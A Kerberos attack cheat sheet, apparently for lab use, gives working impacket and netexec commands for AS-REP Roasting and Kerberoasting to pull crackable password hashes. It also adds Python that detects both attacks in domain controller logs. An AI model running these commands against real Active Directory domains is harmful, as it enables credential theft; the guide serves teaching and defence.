🎭Attacking Kerberos
This guide covers common attack techniques against Kerberos authentication in Active Directory environments.
AS-REP Roast Attack
If you have a list of valid users, you can perform an AS-REP Roast Attack to obtain a Ticket Granting Ticket (TGT) and then crack its hash to get the password.
This attack queries the Domain Controller (DC) to check if any of the users in your list have the Kerberos flag DONT_REQ_PREAUTH enabled.
The attack can be attempted multiple times as you discover more valid users. From BloodHound, you can identify users with this condition.
Commands
# AS-REP Roast using impacket-GetNPUsers
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null
# AS-REP Roast through impacket-GetNPUsers with a while loop
while read username; do impacket-GetNPUsers domain.htb/"$username" -request -no-pass -dc-ip 10.10.10.10 >> hashes.txt; done < users.txt 2>/dev/null
# AS-REP Roast through netexec
netexec ldap 10.10.10.10 -u users.txt -p '' --asreproast hashes.txt
Kerberoasting Attack
If you have valid credentials for a domain user, you can perform a Kerberoasting Attack to obtain a Ticket Granting Service (TGS) from a user that has a servicePrincipalName (SPN) assigned.
The obtained hash can be cracked to retrieve the credentials in plaintext.
Commands
# Kerberoasting Attack through impacket-GetUserSPNs with basic authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request 2>/dev/null
# Kerberoasting Attack through Kerberos authentication (requires TGT ticket in KRB5CCNAME)
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null
# Kerberoasting Attack using Pass-the-Hash
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -hashes :<NTLM_HASH> -request 2>/dev/null
# Kerberoasting Attack through netexec
netexec ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting output.txt
Exception: Kerberoasting Without Credentials
Kerberoasting can also be performed without valid credentials if you know of a user that is vulnerable to AS-REP Roast (i.e., the user has the DONT_REQ_PREAUTH flag enabled).
In the example below, the user called usuarioASREP is susceptible to AS-REP Roast, meaning it has the Kerberos DONT_REQ_PREAUTH flag enabled.
Therefore, you can perform a Kerberoasting Attack without valid domain credentials, as long as you have a user that is susceptible to AS-REP Roast.
impacket-GetUserSPNs -no-preauth 'usuarioASREP' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.10 2>/dev/null
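As an added detection-side example (not part of this cheat sheet), the following Python flags the Windows Security events that the two attacks above leave on a Domain Controller: 4768 TGT requests issued without pre-authentication (AS-REP Roast) and bursts of RC4-encrypted 4769 service-ticket requests from one account (Kerberoasting). The log records are constructed, and the field names assume the events have already been parsed into dicts.

```python
# Added detection example; not code from the original page. Events are assumed
# to be pre-parsed Windows Security log records (EventID 4768 = TGT request,
# 4769 = TGS request) with the field names used below.
from collections import Counter

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "usuarioASREP", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.HTB", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "carol@DOMAIN.HTB", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.51"},
]

RC4_HMAC = "0x17"  # etype 23: the weak, offline-crackable ticket type the tools request

def asrep_roast_candidates(events):
    """4768 with PreAuthType 0 means a TGT was issued without pre-authentication,
    the exact condition AS-REP Roast relies on (a normal client sends type 2)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})

def kerberoast_suspects(events, threshold=3):
    """Return (requester, source IP) pairs that asked for >= threshold distinct
    RC4 service tickets. GetUserSPNs -request pulls one TGS per SPN in a burst;
    computer accounts (trailing $) are excluded since they are not roast targets."""
    counts = Counter()
    for e in events:
        if (e["EventID"] == 4769 and e.get("TicketEncryptionType") == RC4_HMAC
                and not e.get("ServiceName", "").endswith("$")):
            counts[(e["TargetUserName"], e["IpAddress"])] += 1
    return sorted(k for k, n in counts.items() if n >= threshold)
```

On a real DC, event 4768/4769 auditing must be enabled under "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" for these records to exist.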
Key Points
AS-REP Roast targets users with the DONT_REQ_PREAUTH flag enabled
Kerberoasting targets users with Service Principal Names (SPNs)
Both attacks can yield hashes that may be crackable offline
BloodHound can help identify vulnerable users
Multiple authentication methods are available (credentials, hashes, tickets)
Tools Used
impacket-GetNPUsers - For AS-REP Roast attacks
impacket-GetUserSPNs - For Kerberoasting attacks
netexec - Alternative tool for both attack types
BloodHound - For reconnaissance and identifying vulnerable accounts